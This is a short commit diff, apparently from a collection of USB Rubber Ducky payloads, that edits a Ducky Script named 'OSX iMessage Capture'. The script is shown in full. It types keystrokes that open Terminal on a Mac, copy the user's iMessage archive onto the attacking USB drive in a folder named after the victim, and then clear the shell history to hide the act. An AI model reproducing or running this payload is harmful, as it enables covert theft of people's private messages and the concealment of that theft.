Updated Payload OSX iMessage Capture (textile)

This commit is contained in:
Alex 2015-11-23 15:47:26 -06:00
parent 16b3cda3fe
commit a975fc7f88
1 changed files with 5 additions and 4 deletions

View File

@ -1,12 +1,13 @@
<pre><code>DELAY 500
<pre><code>
REM Author: Alex Jay (Minecracker627) (5A13X99)
REM This script captures iMessages and puts it into
REM a folder named automatically to the victims username
DELAY 500
GUI SPACE
DELAY 150
STRING Terminal
ENTER
DELAY 300
REM Author: Alex Jay (Minecracker627) (5A13X99)
REM This script captures iMessages and puts it into
REM a folder named automatically to the victims username
STRING cp -r ~/Library/Messages/Archive /Volumes/RubberDucky/$USER/
ENTER
STRING history -c